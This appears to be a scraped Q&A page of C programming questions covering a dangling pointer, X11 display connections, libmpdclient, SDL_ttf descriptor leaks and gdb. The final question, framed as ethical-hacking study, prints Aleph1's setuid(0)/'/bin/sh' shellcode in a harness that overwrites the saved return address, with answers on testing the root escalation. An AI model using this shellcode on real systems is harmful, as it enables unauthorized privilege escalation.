Can't write to a file when running my code optimized - C

I have a program that writes data to a binary file. It works when I run it in Visual Studio 2013 in Debug mode (no optimization), but when I run it in Release mode with Maximize Speed enabled, it doesn't work (the file ends up empty)...
Can you tell me why it might not work?
EDIT:
Here is a Dr. Memory log from running the application in Release mode; if you see something alarming, please tell me: http://pastebin.com/5s4Z51ZV
Which errors might cause the problem?
Also, should I work on fixing every single one of the errors, or are some of them "false positives"?
EDIT:
After debugging the optimized code following this guide: http://msdn.microsoft.com/en-us/library/vstudio/606cbtzs%28v=vs.100%29.aspx , I found that something very strange happens when I generate a Huffman tree (from a priority queue of characters). This is my code:
HNode * generateHuffmanTree(Queue * queue) // generates a huffman tree from a queue of a file's characters.
{
    HNode * root = (HNode *) calloc(1, sizeof(HNode));
    root->left = dequeue(queue);  // gets the two smallest-amount characters
    root->right = dequeue(queue); // and puts them into left and right of the root.
    root->character = '\0';
    root->value = root->left->value + root->right->value;
    if (isQueueEmpty(queue)) return root; // end condition, if it's the only thing left.
    enqueue(queue, root); // puts the root back in the queue so it can be a part of the process in the next iteration
#ifdef debug
    printQueue(queue);
#endif
    generateHuffmanTree(queue); // runs the operation again, now with the new root in the queue.
}
I can see in the debugger that the problem is not in queue, since it comes in as it should, but the debugger seems to skip my declaration of root, and then when I do root->left it overwrites the data in queue. Does anyone know why this might happen and how to work around or fix it? Or is this not the real problem at all?

I figured out what caused the problem. It had nothing to do with the file specifically: I had a function initMap that creates a local struct, Map m, initializes it with default values and returns &m to another function. I suspected this might be a problem, because the local gets popped off the stack and the pointer is then left dangling, but since it worked while I tested it (in Debug mode) I left it alone. Apparently it doesn't actually work. So instead I did Map * map = (Map *) calloc(1, sizeof(Map)); and it worked.
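For illustration, here is a minimal sketch of the difference (Map is a hypothetical stand-in here, since the real struct isn't shown in the question):

#include <stdlib.h>

typedef struct { int size; int *entries; } Map; /* hypothetical layout */

/* Broken: returns the address of a local variable; the pointer dangles
   once the function returns (undefined behavior that may still "work" in Debug builds). */
Map * initMapBroken(void)
{
    Map m = { 0, NULL };
    return &m;
}

/* Working: allocates the Map on the heap so it outlives the call;
   the caller must free() it when done. */
Map * initMap(void)
{
    return (Map *) calloc(1, sizeof(Map));
}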
Thanks to mafso and Kalsai for helping me figure it out.

Related

Function XOpenDisplay with and without parameter

I have a little issue with the XOpenDisplay function. At school I can run the program and it works well using XOpenDisplay("ip:0"), but at home on my local machine, when I run the program (with the ip changed to the current one), I get "Segmentation fault (core dumped)"; with an empty string, XOpenDisplay(""), it works fine. I need to be able to use an ip. I used xhost +, but nothing changed.
My system is Kubuntu 14.04.1: 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015
Here is the code of the program:
#include <X11/Xlib.h>
#include <X11/X.h>
#include <stdio.h>
#include <stdlib.h> /* exit() */
#include <unistd.h> /* sleep() */
Display *mydisplay;
Window mywindow;
XSetWindowAttributes mywindowattributes;
XGCValues mygcvalues;
GC mygc;
Visual *myvisual;
int mydepth;
int myscreen;
Colormap mycolormap;
XColor mycolor,mycolor1,dummy;
int i;
int main(void)
{
    mydisplay = XOpenDisplay("192.168.0.12:0");
    myscreen = DefaultScreen(mydisplay);
    myvisual = DefaultVisual(mydisplay,myscreen);
    mydepth = DefaultDepth(mydisplay,myscreen);
    mywindowattributes.background_pixel = XWhitePixel(mydisplay,myscreen);
    mywindowattributes.override_redirect = True;
    mywindow = XCreateWindow(mydisplay,XRootWindow(mydisplay,myscreen),
                             0,0,500,500,10,mydepth,InputOutput,
                             myvisual,CWBackPixel|CWOverrideRedirect,
                             &mywindowattributes);
    mycolormap = DefaultColormap(mydisplay,myscreen);
    XAllocNamedColor(mydisplay,mycolormap,"cyan",&mycolor,&dummy);
    XAllocNamedColor(mydisplay,mycolormap,"red",&mycolor1,&dummy);
    XMapWindow(mydisplay,mywindow);
    mygc = DefaultGC(mydisplay,myscreen);
    XSetForeground(mydisplay,mygc,mycolor.pixel);
    XFillRectangle(mydisplay,mywindow,mygc,100,100,300,300);
    XSetForeground(mydisplay,mygc,mycolor1.pixel);
    XSetFunction(mydisplay,mygc,GXcopy);
    XSetLineAttributes(mydisplay,mygc,10,LineSolid,CapProjecting,JoinMiter);
    XDrawLine(mydisplay,mywindow,mygc,100,100,400,400);
    XDrawLine(mydisplay,mywindow,mygc,100,400,400,100);
    XFlush(mydisplay);
    sleep(10);
    XCloseDisplay(mydisplay);
    exit(0);
}
I can only guess that I need to set something, but I have no idea where that option is.
You should always check whether a function returned successfully or not. This is not Haskell, where a monad does all the checking for you; it is C. In your particular case, the problem is that XOpenDisplay fails and returns NULL, and in the next line you try to use the result with DefaultScreen. DefaultScreen is defined as
#define DefaultScreen(dpy) ((dpy)->default_screen)
i.e. it is just a macro that uses its first argument as a pointer. In your case it expands to ((0)->default_screen), i.e. it dereferences a null pointer, and that leads to the segfault you see.
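As a minimal sketch, such a check applied to the code from the question could look like this:

mydisplay = XOpenDisplay("192.168.0.12:0");
if (mydisplay == NULL) {
    fprintf(stderr, "Cannot open display %s\n", XDisplayName("192.168.0.12:0"));
    exit(1);
}
myscreen = DefaultScreen(mydisplay); /* only use the display once we know it is valid */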
Also, about XOpenDisplay("192.168.0.12:0"): you didn't mention that you're trying to connect to another PC, so if it's the same computer the app is running on, try calling the function as XOpenDisplay("127.0.0.1:0");
UPD: okay, I tried to run the code on my PC, and the function doesn't work for me either. To find the reason I ran the code under strace and saw
…
connect(3, {sa_family=AF_INET, sin_port=htons(6000), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connection refused)
…
Aha! So the app is trying to connect to the X server, but the X server refuses the connection. This is actually disabled by default for security reasons, so that nobody can connect to your X server over the network unless you specifically allow it. For the function to work you need to launch your X server with an option that allows such connections. Nowadays display managers are the ones that manage X sessions, so the option you need to set depends on your DM.
The solution for lightdm
Open /etc/lightdm/lightdm.conf and add the line xserver-allow-tcp=true to the [SeatDefaults] section (you will see it).
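With that line added, the relevant part of lightdm.conf would look roughly like this (other keys in the section omitted):

[SeatDefaults]
xserver-allow-tcp=true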
The solution for gdm
Edit the file /etc/gdm/gdm.schemas; you will find something like
<schema>
  <key>security/DisallowTCP</key>
  <signature>b</signature>
  <default>true</default>
</schema>
Change the true to false.

libmpdclient: detect lost connection to MPD daemon

I'm writing a plugin for my statusbar to print the MPD state, currently using the libmpdclient library. It has to be robust and handle lost connections properly in case MPD is restarted, but simply checking with mpd_connection_get_error on the existing mpd_connection object does not work: it detects the error only when the initial mpd_connection_new fails.
This is a simplified version of the code I'm working with:
#include <stdio.h>
#include <unistd.h>
#include <mpd/client.h>
int main(void) {
    struct mpd_connection* m_connection = NULL;
    struct mpd_status* m_status = NULL;
    char* m_state_str;

    m_connection = mpd_connection_new(NULL, 0, 30000);

    while (1) {
        // this check works only on start up (i.e. when mpd_connection_new failed),
        // not when the connection is lost later
        if (mpd_connection_get_error(m_connection) != MPD_ERROR_SUCCESS) {
            fprintf(stderr, "Could not connect to MPD: %s\n", mpd_connection_get_error_message(m_connection));
            mpd_connection_free(m_connection);
            m_connection = NULL;
        }

        m_status = mpd_run_status(m_connection);
        if (mpd_status_get_state(m_status) == MPD_STATE_PLAY) {
            m_state_str = "playing";
        } else if (mpd_status_get_state(m_status) == MPD_STATE_STOP) {
            m_state_str = "stopped";
        } else if (mpd_status_get_state(m_status) == MPD_STATE_PAUSE) {
            m_state_str = "paused";
        } else {
            m_state_str = "unknown";
        }

        printf("MPD state: %s\n", m_state_str);
        sleep(1);
    }
}
When MPD is stopped during the execution of the above program, it segfaults with:
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x00007fb2fd9557e0 in mpd_status_get_state () from /usr/lib/libmpdclient.so.2
The only way I can think of to make the program safe is to establish a new connection in every iteration, which I was hoping to avoid. But even then, what if the connection is lost between individual calls to libmpdclient functions? How often, and more importantly how exactly, should I check whether the connection is still alive?
The only way I could find that really works (beyond reestablishing a connection on every run) is to use the idle command. If mpd_recv_idle (or mpd_run_idle) returns 0, that is an error condition, and you can take it as a cue to free your connection and go from there.
It's not a perfect solution, but it does let you keep a live connection between runs, and it helps you avoid segfaults (though I don't think you can avoid them completely, because if you send a command and mpd is killed before you recv it, I'm pretty sure the library still segfaults). I'm not sure there is a better solution. It would be fantastic if there were a reliable way to detect via the API whether your connection is still alive, but I can't find anything of the sort. libmpdclient doesn't seem well suited to very long-lived connections that have to deal with mpd instances going up and down over time.
Another, lower-level option is to use sockets to talk to MPD through its protocol directly, though in doing that you'd likely reimplement much of libmpdclient anyway.
EDIT: Unfortunately, the idle command blocks until something happens, and can sit blocking for as long as a single audio track lasts, so if you need your program to do other things in the meantime, you'll have to implement it asynchronously or in another thread.
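As a rough sketch of the idle-based approach (my own illustration, not from the original answer; connect_mpd is a made-up helper):

#include <stdio.h>
#include <unistd.h>
#include <mpd/client.h>

// Hypothetical helper: (re)connect until we get a usable connection.
static struct mpd_connection *connect_mpd(void) {
    struct mpd_connection *c = mpd_connection_new(NULL, 0, 30000);
    while (c == NULL || mpd_connection_get_error(c) != MPD_ERROR_SUCCESS) {
        if (c != NULL)
            mpd_connection_free(c);
        sleep(1);
        c = mpd_connection_new(NULL, 0, 30000);
    }
    return c;
}

int main(void) {
    struct mpd_connection *conn = connect_mpd();
    while (1) {
        // Blocks until something changes in MPD; returns 0 on error,
        // e.g. when the connection has been lost.
        enum mpd_idle events = mpd_run_idle(conn);
        if (events == 0) {
            mpd_connection_free(conn);
            conn = connect_mpd();  // reconnect and keep going
            continue;
        }
        printf("MPD state changed\n");  // query the status here, checking for NULL
    }
}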
Assuming "conn" is a connection created with "mpd_connection_new":
if (mpd_connection_get_error(conn) == MPD_ERROR_CLOSED) {
    // mpd_connection_get_error_message(conn)
    // will return "Connection closed by the server"
}
You can run this check after almost any libmpdclient call, including "mpd_recv_idle" or (as per your example) "mpd_run_status".
I'm using libmpdclient 2.18, and this certainly works for me.
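For example, combined with the status query from the question, the check could look roughly like this (a sketch; it assumes that reconnecting simply means freeing the connection and calling mpd_connection_new again):

struct mpd_status *status = mpd_run_status(conn);
if (status == NULL) {
    // the call failed; inspect the error state on the connection
    if (mpd_connection_get_error(conn) == MPD_ERROR_CLOSED) {
        fprintf(stderr, "Lost connection: %s\n", mpd_connection_get_error_message(conn));
        mpd_connection_free(conn);
        conn = mpd_connection_new(NULL, 0, 30000);  // try to reconnect
    }
} else {
    // ... use mpd_status_get_state(status) as before ...
    mpd_status_free(status);
}

Checking the pointer returned by mpd_run_status for NULL before calling mpd_status_get_state also avoids the segfault from the original loop.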

TTF_OpenFont fails on Nth attempt

I'm trying to make a game in C using SDL_ttf to display the score every time the display is refreshed. The code looks like:
SDL_Surface *score = NULL;
TTF_Font *font;
SDL_Color color = { 255, 255, 255 };

font = TTF_OpenFont( "/home/sophie/Bureau/snake/data/ubuntu.ttf", 28 );
if (font == NULL) {
    printf("%s\n", TTF_GetError());
}
score = TTF_RenderText_Solid( font, "score to display", color );
SDL_BlitSurface( score, NULL, screen, NULL );
SDL_Flip(screen);
When I launch the game, everything works properly, but after a while the game crashes and I get the following error:
Couldn't open /home/sophie/Bureau/snake/data/ubuntu.ttf
libgcc_s.so.1 must be installed for pthread_cancel to work
Abandon (core dumped)
I tried different fonts but I still have this problem.
Then I used a counter in the main loop of the game and found that the game always crashes after the 1008th iteration, regardless of the speed I set (in snake everything goes faster as you score points).
I don't know where the problem comes from, nor what exactly the error message means.
Please tell me if you have any ideas, or if my question is poorly formulated. I looked on several forums and found nothing corresponding to my case; I could use any help now!
Thanks in advance
It looks like you're repeatedly opening the font every time you go through this function:
font = TTF_OpenFont( "/home/sophie/Bureau/snake/data/ubuntu.ttf", 28 );
While it may not be in the main game loop, as Jongware suspected, you mentioned that the code crashes after 1008 executions of this code path.
What is happening is that a resource is being leaked. Either the resource needs to be released by calling TTF_CloseFont(), or (more efficiently) you can hold onto the handle after the first time you open it and reuse it on each call. Use a static declaration for the font and initialize it to NULL:
static TTF_Font *font = NULL;
Then, if it hasn't been opened yet, open it:
if (!font) {
    font = TTF_OpenFont( "/home/sophie/Bureau/snake/data/ubuntu.ttf", 28 );
}
This initializes font the first time through, while subsequent iterations over the code will not needlessly redo the process and leak the resource.
You mentioned that the code crashes after 1008 passes through this function. That's pretty close to 1024. If memory serves, Linux limits a process to 1024 open file descriptors by default (this is tunable, but I have run into the limit while debugging resource leaks before). There are probably 16 other file descriptors open in your process, and then one descriptor is leaked by each invocation of TTF_OpenFont. Once you go above 1024, boom.
You can check the number of open file descriptors of a particular process (<pid>) by counting the entries in /proc/<pid>/fd/.
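Putting the pieces together, the score-drawing code from the question might end up looking roughly like this (a sketch with a made-up function name drawScore; the rendered surface is freed as well, since TTF_RenderText_Solid allocates a new surface on every call):

void drawScore(SDL_Surface *screen, const char *text)
{
    static TTF_Font *font = NULL;   /* opened once, reused on later calls */
    SDL_Color color = { 255, 255, 255 };
    SDL_Surface *score = NULL;

    if (!font) {
        font = TTF_OpenFont("/home/sophie/Bureau/snake/data/ubuntu.ttf", 28);
        if (font == NULL) {
            printf("%s\n", TTF_GetError());
            return;
        }
    }

    score = TTF_RenderText_Solid(font, text, color);
    if (score != NULL) {
        SDL_BlitSurface(score, NULL, screen, NULL);
        SDL_FreeSurface(score);     /* avoid leaking the surface as well */
    }
    SDL_Flip(screen);
}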

Call to malloc failing in gdb session

I am trying to debug a C program and gdb is telling me there is a segfault on line 329 of a certain function. So I set a breakpoint at that function and I am trying to step through it. However, whenever I hit line 68 I get this complaint from gdb:
(gdb) step
68 next_bb = (basic_block *)malloc(sizeof(basic_block));
(gdb) step
*__GI___libc_malloc (bytes=40) at malloc.c:3621
3621 malloc.c: No such file or directory.
in malloc.c
I don't know what this means. The program runs perfectly on all but one set of inputs, so this call to malloc clearly succeeds during other executions of the program. And, of course, I have #include <stdlib.h>.
Here is the source code:
// Block currently being built.
basic_block *next_bb = NULL;

// Traverse the list of instructions in the procedure.
while (curr_instr != NULL)
{
    simple_op opcode = curr_instr->opcode;

    // If we are not currently building a basic_block then we must start a new one.
    // A new block can be started with any kind of instruction.
    if (!in_block)
    {
        // Create a new basic_block.
        next_bb = (basic_block *)malloc(sizeof(basic_block));
You can safely ignore this. gdb is complaining that it doesn't have the source for malloc, and it's almost certain you don't want to step through malloc's source anyway.
Two easy solutions:
Use next instead of step; it won't descend into functions.
If you've accidentally stepped into a function already, use finish to run until the function returns.
And an alternative approach:
You could also break a bit before the segfault, rather than stepping through the whole code.
You can do this by putting a breakpoint on a particular line with break <source file>:<line num> (for example break foo.c:320 to break on line 320 of foo.c).
Or you can break on a particular function with break <function name> (for example break foo will break at the top of the foo() function).
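For example, if the crash reported on line 329 is in a (made-up) source file cfg.c, the session might go:

(gdb) break cfg.c:329
(gdb) run
(gdb) next

break stops the program just before the suspect line, run executes until the breakpoint is hit, and next then steps over calls such as malloc instead of descending into them.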

I have this code .... Ethical Hacking

I am following this eBook about Ethical Hacking, and I have reached the Linux Exploit chapter. This is the code, using Aleph1's shellcode.
//shellcode.c
char shellcode[] =  //setuid(0) & Aleph1's famous shellcode, see ref.
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"  //setuid(0) first
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main() {                   //main function
    int *ret;                  //ret pointer for manipulating saved return.
    ret = (int *)&ret + 2;     //set ret to point to the saved return
                               //value on the stack.
    (*ret) = (int)shellcode;   //change the saved return value to the
                               //address of the shellcode, so it executes.
}
I give this superuser privileges with
chmod u+s shellcode
as the superuser, then go back to a normal user with
su - normal_user
but when I run ./shellcode I expect to become root; instead I am still normal_user.
So, any help?
By the way, I am working on BT4-Final, I turned off ASLR, and I'm running BT4 in VMware...
If this is an old exploit... shouldn't it already have been fixed long ago?
By the way, a piece of personal advice: don't be so lame as to use that nickname and then go around asking about exploits.
Is the shellcode executable owned by root? The setuid bit (u+s) makes the executable run with the privileges of its owner, which is not necessarily root.
Well, setuid() changes the user for the currently running program. Your shell will still be running under your normal user! :)
Either that, or I don't get this hack's purpose.
I think setuid only sets the uid to 0 while the program is running. Can you perform some operation to check the UID while the shellcode is running?
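As a side note, one simple way to do that check (my own sketch, not from the book): a tiny program that prints the real and effective user IDs. Run it the same way; with the setuid bit set and root as the owner, the effective UID should come out as 0.

#include <stdio.h>
#include <unistd.h>

int main(void) {
    // With the setuid bit set and root ownership, geteuid() should be 0
    // while getuid() stays your normal user's id.
    printf("real uid: %d, effective uid: %d\n", (int) getuid(), (int) geteuid());
    return 0;
}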
If I get it right, the code you are executing (setuid(0)) is a system call that changes the current user to root. The catch is that it changes the user id only for that process, giving that process root authority. If it is working, you could run anything with root privileges.
To test it, create a file or directory as root, make sure you can't remove it as a simple user, and then try adding code to your executable that removes the file. If the code is working, the file should be deleted.
Then, to gain root powers, try to fork a new shell from within your program. I'm not sure if it's possible, though.
...however, this is an old exploit. Old kernels might be open to this, but using any recent release will do nothing at all.
UPDATE: I've just re-read the code and realized the call to the shell is there (/bin/sh), so you are already forking to a supposedly super-user shell. To check whether it's actually working, look at the PID of your shell before and after the call. If it has changed, exit the shell; you should return to the previous PID. That means (1) it worked, you manipulated the stack and executed the code there, and (2) the exploit is fixed and the kernel is preventing you from gaining root access.
